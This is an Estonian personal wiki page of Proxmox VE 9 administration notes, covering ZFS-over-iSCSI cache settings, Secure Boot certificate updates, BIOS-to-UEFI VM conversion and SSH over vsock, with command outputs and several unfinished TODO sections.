Imre kasutab arvutit - Kasutaja kaastöö [et]

Proxmox v. 9 kasutamine

2026-06-21T10:00:23Z

Imre: /* Üle vsock ssh kasutamine - Ubuntu 24.04 */

===Sissejuhatus===

TODO

===Virtuaalne riistvara===

Klaviatuur ja hiir

<pre>
root@pwrk-02:~# systool -b serio
Bus = "serio"

Device = "serio0"
Device = "serio1"

root@pwrk-02:~# systool -b serio -v
Bus = "serio"

Device = "serio0"
Device path = "/sys/devices/platform/i8042/serio0"
bind_mode = "auto"
description = "i8042 KBD port"
drvctl = <store method only>
err_count = "0"
extra = "0"
firmware_id = "PNP: PNP0303"
force_release = "369-370"
modalias = "serio:ty06pr00id00ex00"
scroll = "0"
set = "2"
softraw = "1"
softrepeat = "0"
uevent = "DRIVER=atkbd
SERIO_TYPE=06
SERIO_PROTO=00
SERIO_ID=00
SERIO_EXTRA=00
MODALIAS=serio:ty06pr00id00ex00
SERIO_FIRMWARE_ID=PNP: PNP0303"

Device = "serio1"
Device path = "/sys/devices/platform/i8042/serio1"
bind_mode = "auto"
description = "i8042 AUX port"
drvctl = <store method only>
firmware_id = "PNP: PNP0f13"
modalias = "serio:ty01pr00id00ex00"
protocol = "VirtualPS/2"
rate = "100"
resetafter = "5"
resolution = "200"
resync_time = "0"
uevent = "DRIVER=psmouse
SERIO_TYPE=01
SERIO_PROTO=00
SERIO_ID=00
SERIO_EXTRA=00
MODALIAS=serio:ty01pr00id00ex00
SERIO_FIRMWARE_ID=PNP: PNP0f13"
</pre>

===remote zfs over iscsi===

====Mõisted====

* FUA (Forced Unit Access) -
* WCE (Write Cache Enable) -
* TPU (Thin Provisioning UNMAP) -
* TPWS (WRITE_SAME / Zeroing) -
* VFS (virtual file system) -

====Tööpõhimõte====

Virtuaalse arvuti vaatest andmetega tegelemine

pve virtuaalne arvuti -> pve füüsiline arvuti -> over-iscsi-zfs-storage-server

Sõltuvalt qemu virtuaalse arvuti virtuaalse plokkseadme 'Cache' seadistustest on võimalik erinevate cache komplektide-kombinatsioonide kasutamine andmete liikumisel virtuaalses arvutis töötava protsessi juurest zfs storage serveri füüsilisele plokkseadmele. Tundub, et 2025 aastal on kõige keskmisemale kasutusele sobiv valik 'Cache: nocache'

* hea jõudlus
* hea terviklus

Andmete liikumise teekond

* virtuaalse arvuti rakendus
* virtuaalse arvuti vfs failisüsteem
* virtuaalse arvuti page cache (vfs'ga seotud)
* virtuaalse arvuti ext4 failisüsteem (ext4 draiver)
* virtuaalse arvuti lvm
* virtuaalse arvuti fdisk partitsioonid
* virtuaalse arvuti virtuaalne sata vms kontroller
* füüsilise arvuti qemu protsess
* füüsilise arvuti open-iscsi poolt teostatud /dev/sda scsi plokkseade (puudub cache)
* füüsilises arvutis storage'ga seotud cache puudub
* storage arvuti targetcli (puutub cache)
* storage arvuti zfs ressurss (sisaldab zfs cache)
* storage avuti füüsilise plokkseadme controller-cache

'Cache: nocache' parameeter on üks vähestest parameetritest, mis avaldab mõju nö mõlemas suunas

* virtuaalse arvuti seest kasutada olevale storage ressursile
* kuidas füüsilise arvuti sees virtuaalsele arvutile vastav qemu protsess kasutab allolevat plokkseadet

Käesolevas tekstis kirjeldatakse nelja komponendi seadistamist

* virtuaalsele arvutile vastav qemu protsess
* iscsi initiator
* iscsi target
* zfs lahendus

====zfs lahendus iscsi target arvutis====

Füüsilised kettad on kasutusel nö kõige tavalisemal viisil, eriti tähendab see, et ketastel on sisselülitatud nö tavaline controller-cache

<pre>
root@pve-svc-02:~# lsscsi -s | grep 4.00T
[2:0:0:0] disk ATA CT4000MX500SSD1 045 /dev/sdc 4.00TB
[3:0:0:0] disk ATA CT4000MX500SSD1 045 /dev/sdd 4.00TB
[N:0:1:1] disk Samsung SSD 990 PRO with Heatsink 4TB__1 /dev/nvme0n1 4.00TB
[N:1:1:1] disk Samsung SSD 990 PRO with Heatsink 4TB__1 /dev/nvme1n1 4.00TB
</pre>

zfs lülituse moodustamine

<pre>
root@pve-svc-02:~# cat create-zpool-raidz1-x4.sh
zpool create -o ashift=13 zp_data raidz1 \
/dev/disk/by-id/ata-CT4000MX500SSD1_2246E686FE58 \
/dev/disk/by-id/ata-CT4000MX500SSD1_2246E686FF7B \
/dev/disk/by-id/nvme-Samsung_SSD_990_PRO_with_Heatsink_4TB_S7DSNJ0X501827B \
/dev/disk/by-id/nvme-Samsung_SSD_990_PRO_with_Heatsink_4TB_S7DSNJ0X501856Z
</pre>

zfs cache töötab tavalisel viisil, st on sisse lülitatud olekus, nt

<pre>
root@pve-svc-02:~# zfs get all | grep -i cache | grep vm-106-disk-0
zp_crucial_mx_4/vm-106-disk-0 primarycache all default
zp_crucial_mx_4/vm-106-disk-0 secondarycache all default
</pre>

====targetcli iscsi target arvutis====

targetcli seadistamine koosneb kahest tegevusest

* zfs põhise alus-storage storage publitseerimine
* publitseerimisel sobivalt scsi protokolli parameetrite kasutamine (eriti cache, sparse jms esitamine)

<pre>
/> /iscsi create iqn.2025-10.moraal.srv:storage.zfstarget
/> /iscsi/iqn.2025-10.moraal.srv:storage.zfstarget/tpg1/acls create iqn.1993-08.org.debian:01:4cbe32bd26b
</pre>

Sobiv seadistus, mis tuleb plokk-ressursi jaoks kehtestada

<pre>
root@pve-svc-02:~# targetcli /backstores/block/zp_crucial_mx_4-vm-108613-disk-4 get attribute | grep =
======================
alua_support=1
block_size=512
emulate_3pc=1
emulate_caw=1
emulate_dpo=1
emulate_fua_read=1
emulate_fua_write=1
emulate_model_alias=1
emulate_pr=1
emulate_rest_reord=0
emulate_rsoc=1
emulate_tas=1
emulate_tpu=0
emulate_tpws=0
emulate_ua_intlck_ctrl=0
emulate_write_cache=0
enforce_pr_isids=1
force_pr_aptpl=0
hw_block_size=512 [ro]
hw_max_sectors=32768 [ro]
hw_pi_prot_type=0 [ro]
hw_queue_depth=128 [ro]
is_nonrot=1
max_unmap_block_desc_count=1
max_unmap_lba_count=131072
max_write_same_len=65535
optimal_sectors=32768
pgr_support=1
pi_prot_format=0
pi_prot_type=0
pi_prot_verify=0
queue_depth=128
submit_type=0
unmap_granularity=8
unmap_granularity_alignment=0
unmap_zeroes_data=0
</pre>

kus

* TODO

Muudatuse tegemine

<pre>
/backstores/b...108613-disk-4> set attribute emulate_tpws=0
/backstores/b...108613-disk-4> set attribute emulate_tpu=0
</pre>

Kasutamine paistab välja selline

<pre>
root@pve-svc-02:~# targetcli
targetcli shell version 2.1.53
Copyright 2011-2013 by Datera, Inc and others.
For help on commands, type 'help'.

/> ls
o- / ......................................................................................................................... [...]
o- backstores .............................................................................................................. [...]
| o- block .................................................................................................. [Storage Objects: 3]
| | o- zp_crucial_mx_4-vm-100-disk-0 ......................... [/dev/zp_crucial_mx_4/vm-100-disk-0 (20.0GiB) write-thru activated]
| | | o- alua ................................................................................................... [ALUA Groups: 1]
| | | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| | o- zp_crucial_mx_4-vm-106-disk-5 ......................... [/dev/zp_crucial_mx_4/vm-106-disk-5 (16.0GiB) write-thru activated]
| | | o- alua ................................................................................................... [ALUA Groups: 1]
| | | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| | o- zp_crucial_mx_4-vm-108613-disk-1 .................... [/dev/zp_crucial_mx_4/vm-108613-disk-1 (4.0GiB) write-thru activated]
| | o- alua ................................................................................................... [ALUA Groups: 1]
| | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| o- fileio ................................................................................................. [Storage Objects: 0]
| o- pscsi .................................................................................................. [Storage Objects: 0]
| o- ramdisk ................................................................................................ [Storage Objects: 0]
o- iscsi ............................................................................................................ [Targets: 1]
| o- iqn.2025-10.moraal.srv:storage.zfstarget .......................................................................... [TPGs: 1]
| o- tpg1 ............................................................................................... [no-gen-acls, no-auth]
| o- acls .......................................................................................................... [ACLs: 1]
| | o- iqn.1993-08.org.debian:01:4cbe32bd26b ................................................................ [Mapped LUNs: 3]
| | o- mapped_lun0 ...................................................... [lun0 block/zp_crucial_mx_4-vm-108613-disk-1 (rw)]
| | o- mapped_lun1 ......................................................... [lun1 block/zp_crucial_mx_4-vm-106-disk-5 (rw)]
| | o- mapped_lun2 ......................................................... [lun2 block/zp_crucial_mx_4-vm-100-disk-0 (rw)]
| o- luns .......................................................................................................... [LUNs: 3]
| | o- lun0 .............. [block/zp_crucial_mx_4-vm-108613-disk-1 (/dev/zp_crucial_mx_4/vm-108613-disk-1) (default_tg_pt_gp)]
| | o- lun1 .................... [block/zp_crucial_mx_4-vm-106-disk-5 (/dev/zp_crucial_mx_4/vm-106-disk-5) (default_tg_pt_gp)]
| | o- lun2 .................... [block/zp_crucial_mx_4-vm-100-disk-0 (/dev/zp_crucial_mx_4/vm-100-disk-0) (default_tg_pt_gp)]
| o- portals .................................................................................................... [Portals: 1]
| o- 0.0.0.0:3260 ..................................................................................................... [OK]
o- loopback ......................................................................................................... [Targets: 0]
o- srpt ............................................................................................................. [Targets: 0]
o- vhost ............................................................................................................ [Targets: 0]
o- xen-pvscsi ....................................................................................................... [Targets: 0]
/>
</pre>

Lisaks saab portaali käest küsida attribute ja parameter komplekte, nt

<pre>
root@pm60-trt:~# targetcli /iscsi/iqn.2022-09.ee.moraal:pbs-pub/tpg1 get parameter | grep =
======================
AuthMethod=CHAP
DataDigest=CRC32C,None
DataPDUInOrder=Yes
DataSequenceInOrder=Yes
DefaultTime2Retain=20
DefaultTime2Wait=2
ErrorRecoveryLevel=0
FirstBurstLength=65536
HeaderDigest=CRC32C,None
IFMarkInt=Reject
IFMarker=No
ImmediateData=Yes
InitialR2T=Yes
MaxBurstLength=262144
MaxConnections=1
MaxOutstandingR2T=1
MaxRecvDataSegmentLength=8192
MaxXmitDataSegmentLength=262144
OFMarkInt=Reject
OFMarker=No
TargetAlias=LIO Target

root@pm60-trt:~# targetcli /iscsi/iqn.2022-09.ee.moraal:pbs-pub/tpg1 get attribute | grep =
======================
authentication=1
cache_dynamic_acls=0
default_cmdsn_depth=64
default_erl=0
demo_mode_discovery=1
demo_mode_write_protect=1
fabric_prot_type=0
generate_node_acls=0
login_keys_workaround=1
login_timeout=15
prod_mode_write_protect=0
t10_pi=0
tpg_enabled_sendtargets=1
root@pm60-trt:~#
</pre>

kus

* parameter - võrgus kõneldavad asjad
* attribute - lokaalselt olukorda määratlevad asjad

====iscsi initiator====

TODO

====qemu protsess====

Kasutamine

[[Fail:20251019-remote-zfs-over-iscsi-01.png|600px]]

====Kasulikud lisamaterjalid====

TODO

===Secure boot - nn Microsoft 2023 sertifikaat===

====Tööpõhimõte====

TODO

====Olemasolev olukord enne muudatust====

<pre>
root@pwrk-01:~# apt-get install efitools
root@pwrk-01:~# (printf "db: \n"; efi-readvar -v db; printf "\nKEK: \n"; efi-readvar -v KEK) | grep -E "2011|2023"
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Windows Production PCA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation UEFI CA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation KEK CA 2011
</pre>

====Muudatus====

<pre>
root@pve-wrx90e:~# qm enroll-efi-keys 902198
skipping - OS type is neither Windows 10 nor Windows 11

root@pve-wrx90e:~# qm set 902198 --ostype win10
root@pve-wrx90e:~# qm enroll-efi-keys 902198
root@pve-wrx90e:~# qm set 902198 --ostype l26
</pre>

ja

<pre>
from

efidisk0: si-dpool:vm-902198-disk-0,efitype=4m,pre-enrolled-keys=1,size=1M

to

efidisk0: si-dpool:vm-902198-disk-0,efitype=4m,ms-cert=2023w,pre-enrolled-keys=1,size=1M
</pre>

====Uus olukord peale muudatust====

<pre>
root@pwrk-02:~# (printf "db: \n"; efi-readvar -v db; printf "\nKEK: \n"; efi-readvar -v KEK) | grep -E "2011|2023"
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Windows Production PCA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation UEFI CA 2011
C=US, O=Microsoft Corporation, CN=Microsoft UEFI CA 2023
C=US, O=Microsoft Corporation, CN=Windows UEFI CA 2023
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation KEK CA 2011
</pre>

====WebGUI abil====

WebGUI abil vm sertifikaat muudatus

Disk Action -> Enroll Updated Certificates

[[Fail:20260611-pve-ms-cert-2023-01.png|700px]]

kus

* TODO

===Misc===

====pveupdate====

* uuendab webgui liidese sertifikaadi

<pre>
root@pve-wrx90e:~# pveupdate
Loading ACME account details
Placing ACME order
Order URL: https://acme-v02.api.letsencrypt.org/acme/order/2232348225/504476182801

Getting authorization details from 'https://acme-v02.api.letsencrypt.org/acme/authz/2232348225/694056506271'
The validation for pve-wrx90e.auul.pri.ee is pending!
Setting up webserver
Triggering validation
Sleeping for 5 seconds
Status is 'valid', domain 'pve-wrx90e.auul.pri.ee' OK!

All domains validated!

Creating CSR
Checking order status
Order is ready, finalizing order
valid!

Downloading certificate
Setting pveproxy certificate and key
Restarting pveproxy
Revoking old certificate
Revoke request to CA failed: Error: POST to https://acme-v02.api.letsencrypt.org/acme/revoke-cert
{
"type": "urn:ietf:params:acme:error:unauthorized",
"detail": "Unable to revoke :: Certificate is expired",
"status": 403
}
</pre>

====pveupgrade====

* uuendab süsteemi apt paketihaldusega tarkvara

===BIOS arvuti teisendamine UEFI arvutiks===

====Tööpõhimõte====

Peamised kaalutlused BIOS arvuti teisendamisel UEFI arvutiks

* vajadus saada osa secure boot lahendusega kaasnevast turvalisusest
* nö täieline reinstall oleks liiga aeganõudev, kohmakas jne

Muudatus seisneb virtuaalsele arvutile täiendava nö esimese plokkseadme lisamisel, suurusega 1 G. Sinna moodustatakse gpt partitsioonitabel ning vfat failisüsteem, ja ta vastab nö kataloogile /boot/efi, sinna ta ka monteeritakse kokkuvõttes. Juurfailisüsteem ja muu jääb sinna kus ta seni on olnud. Oluline on, et muudatuse käigus ei muudeta olemasoleva plokkseadme partitsioonitabelit ega lvm vms, st ebaõnnestumisel saab pöörduda tagasi kergesti (varundus peaks aga siiski olema olemas).

====Muudatuse protseduur====

Enne muudatust paistab virtuaalne arvuti selline

[[Fail:20260516-from-bios-to-uefi-01.png|700px]]

ning

<pre>
# df -T -h -t ext4
Failisüsteem Tüüp Maht Kasut Vaba Kas% Haagitud
/dev/mapper/system-root ext4 11G 8,2G 2,2G 80% /
/dev/vda1 ext4 462M 325M 109M 75% /boot
</pre>

Lisatakse töötavale arvutile 1 g plokkseade

Hardware -> Add disk -> ...

Veendutakse, mis on konkreetsel juhtumil 1 g lisatud plokkseadme nimi, nt

<pre>
# fdisk /dev/vdb -l
Disk /dev/vdb: 1 GiB, 1073741824 bytes, 2097152 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
</pre>

edasi käsundamine

<pre>
# apt-get install parted

# parted /dev/vdb mklabel gpt
# parted /dev/vdb mkpart primary fat32 1MiB 100%
# parted /dev/vdb set 1 esp on
# mkfs.vfat -F 32 /dev/vdb1
# mkdir -p /boot/efi
# blkid /dev/vdb1
</pre>

Muuta /etc/fstab faili, st lisada üks rida olemaoleva /boot rea alla, uuid on mitte partitsiooni, aga vfat failisüsteemi

<pre>
# cat /etc/fstab
..
UUID=XXXX-XXXX /boot/efi vfat defaults 0 2
</pre>

Lisada paketid

<pre>
# systemctl daemon-reload
# mount /boot/efi
# apt update
# apt install grub-efi-amd64-signed shim-signed mokutil
# grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=debian --removable
# update-grub
</pre>

tulemusena

<pre>
# find /boot/efi/ -type f -ls
115 932 -rwxr-xr-x 1 root root 952384 mai 17 12:00 /boot/efi/EFI/BOOT/BOOTX64.EFI
116 2624 -rwxr-xr-x 1 root root 2685544 mai 17 12:00 /boot/efi/EFI/BOOT/grubx64.efi
117 832 -rwxr-xr-x 1 root root 851368 mai 17 12:00 /boot/efi/EFI/BOOT/mmx64.efi
118 4 -rwxr-xr-x 1 root root 112 mai 17 12:00 /boot/efi/EFI/BOOT/BOOTX64.CSV
119 4 -rwxr-xr-x 1 root root 112 mai 17 12:00 /boot/efi/EFI/BOOT/grub.cfg

# cat /boot/efi/EFI/BOOT/grub.cfg
search.fs_uuid 5ebbc6f0-69e8-413b-bb4f-4ec0fa5d2fc1 root
set prefix=($root)'/grub'
configfile $prefix/grub.cfg

# blkid /dev/vda1
/dev/vda1: UUID="5ebbc6f0-69e8-413b-bb4f-4ec0fa5d2fc1" BLOCK_SIZE="1024" TYPE="ext4" PARTUUID="cfa36d3a-01"
</pre>

Õeldakse virtuaalsele arvutile poweroff ja muudetakse seadistusi

* lisatakse 'EFI Disk' (virtuaalne efi riistvara seadistuste salvestamine jms)
* muudetakse bios -> uefi
* muudetakse chipset i440fx -> q35
* muudetakse display default -> virtio-gpu

Peale muudatust paistab virtuaalne arvuti selline

[[Fail:20260516-from-bios-to-uefi-02.png|700px]]

Lisaks on boot järjekorra seadmed muudetud

[[Fail:20260516-from-bios-to-uefi-03.png|700px]]

kus

* tingimata vajalik on virtio1 ja virtio0 - esimesel on bootload ja grub.cfg lühike konf, teisel on konfi sisuline osa

Tulemusena töötab arvuti uefi secure boot režiimis

<pre>
# mokutil --sb-state
SecureBoot enabled

# df -t vfat -t ext4 -T -h
Failisüsteem Tüüp Maht Kasut Vaba Kas% Haagitud
/dev/mapper/system-root ext4 11G 8,2G 2,2G 80% /
/dev/vda1 ext4 462M 325M 109M 75% /boot
/dev/vdb1 vfat 1020M 8,7M 1012M 1% /boot/efi
</pre>

Kõige lõpus võiks veel öelda, nii tekivad nö naturaalsed efibootmgr ja /boot/efi sissekanded nagu nad oleks seal nö sündinud-uefi'na arvutil

<pre>
# efibootmgr
BootCurrent: 0002
Timeout: 3 seconds
BootOrder: 0002,0003,0000,0001
Boot0000* BootManagerMenuApp FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(eec25bdc-67f2-4d95-b1d5-f81b2039d11d)
Boot0001* EFI Firmware Setup FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(462caa21-7614-4503-836e-8ab6f4662331)
Boot0002* UEFI Misc Device PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xb,0x0){auto_created_boot_option}
Boot0003* UEFI Misc Device 2 PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xa,0x0){auto_created_boot_option}

# grub-install /dev/vdb
Installing for x86_64-efi platform.
Installation finished. No error reported.

# efibootmgr
BootCurrent: 0002
Timeout: 3 seconds
BootOrder: 0004,0002,0003,0000,0001
Boot0000* BootManagerMenuApp FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(eec25bdc-67f2-4d95-b1d5-f81b2039d11d)
Boot0001* EFI Firmware Setup FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(462caa21-7614-4503-836e-8ab6f4662331)
Boot0002* UEFI Misc Device PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xb,0x0){auto_created_boot_option}
Boot0003* UEFI Misc Device 2 PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xa,0x0){auto_created_boot_option}
Boot0004* debian HD(1,GPT,0fb8cfd1-c90b-4da2-97db-ceda14464a90,0x800,0x1ff000)/File(\EFI\proxmox\shimx64.efi)
</pre>

====Boot Order märkused====

PVE webgui Boot Order määrab kaks

* millised plokkseadmed osalevad uefi faasis
* millised järjekorras plokkseadmed osalevad uefi faasis alglaadimisel

Kui on linnutatud ainult üks seade

[[Fail:20260516-from-bios-to-uefi-05.png|800px]]

Kui on linnutatud ainult kaks seadet

[[Fail:20260516-from-bios-to-uefi-04.png|800px]]

Antud juhul on see väga oluline kuna grub alglaadur on kahel seadmel laiali

* grub.efi rakendus asub /dev/vdb
* grub.conf seadistus asub /dev/vda

Kui Boot Order on linnutatud vaid /dev/vda, siis peatub arvuti käivitumine 'grub>' prompt juures. Selles mõttes võiks olla PVE webgui osakonna nimeks nt 'UEFI device visibility and Boot Order'.

===Üle vsock ssh kasutamine - Ubuntu 26.04 ja Debian v. 13===

Osutub, et uuemal ajal, st PVE v. 9, Debian v. 13 virtuaalne avuti on võimalik PVE host pealt pöörduda guest poole üle ssh kasutades vsock protokolli (mitte tavalist tcp/ip protokollil põhinevat võrku). Selleks tuleb virtuaalsele arvutile lisada PVE platvormi poolt vsock tugi

<pre>
root@pve-wrx90e:~# head -n 1 /etc/pve/qemu-server/50056.conf
args: -device vhost-vsock-pci,guest-cid=50056
</pre>

ja virtuaalsel arvutil peab olema tarkvaraline vsock tugi. Nt Debian v. 13 puhul on sshd serverisse see integreeritud

<pre>
root@unifi-oss:~# systemctl | grep ssh
ssh.service loaded active running OpenBSD Secure Shell server
sshd@2-50056:22-2:3327097365.service loaded active running OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097364)
system-sshd.slice loaded active active Slice /system/sshd
sshd-unix-local.socket loaded active listening OpenSSH Server Socket (systemd-ssh-generator, AF_UNIX Local)
sshd-vsock.socket loaded active listening OpenSSH Server Socket (systemd-ssh-generator, AF_VSOCK)
ssh-access.target loaded active active SSH Access Available
</pre>

kus

* systemd-ssh-generator on selline süsteem, mis käigult avastab süsteemi võimekusi ja vastavalt seadistab teenustele omadusi (nt ssh puhul lülitatakse sisse vsock tugi)

ning

<pre>
root@unifi-oss:~# systemctl status sshd@2-50056:22-2:3327097365.service
● sshd@2-50056:22-2:3327097365.service - OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097365)
Loaded: loaded (/usr/lib/systemd/system/sshd@.service; static)
Active: active (running) since Mon 2026-06-01 00:04:39 EEST; 16s ago
Invocation: 84acdad56690460e8e0fbffd2ecd4d69
TriggeredBy: ● sshd-vsock.socket
Docs: man:sshd(8)
man:sshd_config(5)
Main PID: 876 (sshd-session)
Tasks: 1 (limit: 6978)
Memory: 1.8M (peak: 3.9M)
CPU: 27ms
CGroup: /system.slice/system-sshd.slice/sshd@2-50056:22-2:3327097365.service
‣ 876 "sshd-session: root [priv]"

Jun 01 00:04:39 unifi-oss systemd[1]: Started sshd@2-50056:22-2:3327097365.service - OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097365).
Jun 01 00:04:40 unifi-oss sshd-session[876]: Accepted publickey for root from UNKNOWN port 65535 ssh2: ED25519 SHA256:3cj7QCk4leNOSQJlfeUeHr6YfsA0r3bRUqZS9Rey3jM
Jun 01 00:04:40 unifi-oss sshd-session[876]: pam_unix(sshd:session): session opened for user root(uid=0) by root(uid=0)
</pre>

kus

* triggered by 'sshd-vsock.socket'

ssh kliendi st pve host poolel peab olema teadmine, kuidas käituda kui üritatakse kasutada vsock protokolli üle sshd serverit

<pre>
root@pve-wrx90e:~# cat /lib/systemd/ssh_config.d/20-systemd-ssh-proxy.conf
# SPDX-License-Identifier: LGPL-2.1-or-later
#
# Allow connecting to the local host directly via ".host"
Host .host machine/.host
ProxyCommand /usr/lib/systemd/systemd-ssh-proxy unix/run/ssh-unix-local/socket %p
ProxyUseFdpass yes
CheckHostIP no

# Make sure unix/* and vsock/* can be used to connect to AF_UNIX and AF_VSOCK paths.
# Make sure machine/* can be used to connect to local machines registered in machined.
#
Host unix/* vsock/* machine/*
ProxyCommand /usr/lib/systemd/systemd-ssh-proxy %h %p
ProxyUseFdpass yes
CheckHostIP no

# Disable all kinds of host identity checks, since these addresses are generally ephemeral.
StrictHostKeyChecking no
UserKnownHostsFile /dev/null
</pre>

kus

* tuleb kasutada 'man systemd-ssh-proxy' utiliiti

Kasutamine paistab välja selline

<pre>
root@pve-wrx90e:~# ssh root@vsock/50056
Warning: Permanently added 'vsock/50056' (ED25519) to the list of known hosts.
Linux unifi-oss 6.12.90+deb13.1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.90-2 (2026-05-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun May 31 23:53:37 2026 from 192.168.10.156
root@unifi-oss:~#

root@unifi-oss:~# w
23:59:55 up 6 min, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/1 - 23:59 1.00s 0.00s ? w
</pre>

kus

* vsock kaudu lähenemise puhul on iseloomulik 'FROM -' (tavaliselt on seal src ip aadress)

Peale kasutaja sisselogimist paistab

<pre>
root@unifi-oss:~# ss -a -p --vsock
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
v_str LISTEN 0 0 *:22 *:* users:(("systemd",pid=1,fd=66))
v_str ESTAB 0 0 50056:22 2:3327097366 users:(("sshd-session",pid=914,fd=7),("sshd-session",pid=914,fd=6),("sshd-session",pid=905,fd=7),("sshd-session",pid=905,fd=6),("systemd",pid=1,fd=8))
</pre>

kus

* af_vsock osakonnas on sarnasel af_inet osakonnale ka listen socket ning 'active connected socket'

Tundub, et uuemal ajal on ssh agar kuulama ka af_unix soketil

<pre>
root@unifi-oss:~# screendump | grep -i ssh
[ OK ] Listening on sshd-unix-local.socket - OpenSSH Server Socket (systemd-ssh-generator, AF_UNIX Local).
[ OK ] Listening on sshd-vsock.socket - OpenSSH Server Socket (systemd-ssh-generator, AF_VSOCK).
[ OK ] Reached target ssh-access.target - SSH Access Available.
Starting ssh.service - OpenBSD Secure Shell server...
[ OK ] Started ssh.service - OpenBSD Secure Shell server.
</pre>

ja tõesti, lokaalselt saab arvutisse logida sisse nii

<pre>
root@unifi-oss:~# ssh unix/run/ssh-unix-local/socket
Warning: Permanently added 'unix/run/ssh-unix-local/socket' (ED25519) to the list of known hosts.
Linux unifi-oss 6.12.90+deb13.1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.90-2 (2026-05-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jun 1 00:16:42 2026 from UNKNOWN

root@unifi-oss:~# w
00:16:44 up 23 min, 3 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/2 - 00:16 1.00s 0.00s ? w
root pts/1 - 00:16 2.00s 0.00s ? ssh unix/run/ssh-unix-local/socket
</pre>

Kasulikud lisamaterjalid

* https://www.auul.pri.ee/wiki/Linux_operatsioonis%C3%BCsteemis_t%C3%B6%C3%B6tab_v%C3%B5rgu%C3%BChendus#systemd_kasutamine_network-proxy_rollis

===Üle vsock ssh kasutamine - Ubuntu 24.04 ja Debian v. 12===

Ettevalmistavalt tuleb 22/tcp seadistada käima ainult konkreetselt ip aadressil

<pre>
root@zabbix-pub-01:~# grep ^Liste /etc/ssh/sshd_config
ListenAddress 192.168.10.194

root@zabbix-pub-01:~# systemctl status ssh.service
</pre>

Kusjuures vastav systemd ssh listen osakond jääb nagu on, 0.0.0.0 peale

<pre>
root@zabbix-pub-01:~# grep ^Lis /usr/lib/systemd/system/ssh.socket
ListenStream=0.0.0.0:22
</pre>

kus

* väidetavalt on see vajalik mingi sistemise systemd/ssh jne loogika toimimiseks.

ja laadida kerneli moodul

<pre>
root@zabbix-pub-01:~# modprobe vmw_vsock_virtio_transport
</pre>

Ubuntu 24.04 keskkonnas on tehniliselt kõik vajalik vsock kasutamiseks olemas, tuleb lisada kaks system elementi

* sshd-vsock.socket - õpetab systemd pid=1 protsessile kuulama võrgus 22/vsock pordil
* sshd-vsock@.service - õpetab 22/vsock pordile sissetuleva pöördumist üleandmist sshd protsessile

<pre>
root@zabbix-pub-01:~# ls -ld /etc/systemd/system/sshd-vsock*
-rw-r--r-- 1 root root 380 Jun 20 15:38 /etc/systemd/system/sshd-vsock@.service
-rw-r--r-- 1 root root 265 Jun 20 13:33 /etc/systemd/system/sshd-vsock.socket
</pre>

ning

<pre>
root@zabbix-pub-01:~# cat /etc/systemd/system/sshd-vsock.socket
[Unit]
Description=OpenSSH Server Socket (AF_VSOCK Network-Independent Line)
Documentation=man:sshd(8) man:sshd_config(5)
# Notice: No "Conflicts=" or "Before=" entries are needed here!

[Socket]
ListenStream=vsock::22
Accept=yes

[Install]
WantedBy=sockets.target

root@zabbix-pub-01:~# cat /etc/systemd/system/sshd-vsock@.service
[Unit]
Description=OpenSSH Server Socket Per-Connection Daemon (VSOCK Backup)
Documentation=man:sshd(8) man:sshd_config(5)
After=auditd.service

[Service]
EnvironmentFile=-/etc/default/ssh
# The -i flag forces sshd to run in "inetd" mode to accept the raw systemd socket
ExecStart=-/usr/sbin/sshd -i $SSHD_OPTS
StandardInput=socket
RuntimeDirectory=sshd
RuntimeDirectoryMode=0755
</pre>

Käivitamiseks sobib öelda

<pre>
root@zabbix-pub-01:~# systemctl daemon-reload
root@zabbix-pub-01:~# systemctl enable --now sshd-vsock.socket
</pre>

Tulemusena kuulatakse 22/vsock peal

<pre>
root@zabbix-pub-01:~# systemctl list-sockets | grep ssh
192.168.10.194:22 ssh.socket ssh.service
vsock::22 sshd-vsock.socket -
</pre>

Kasutamine paistab välja nii

<pre>
root@pve-wrx90e:~# ssh root@vsock/50194
</pre>

===Proxmox VE Firewall===

====Misc====

Probleeme tekitada võiv kombinatsioon, vältida

* Hardware -> network device -> Firewall - Enable
* Firewall -> Option - No

====Kasulikud lisamaterjalid====

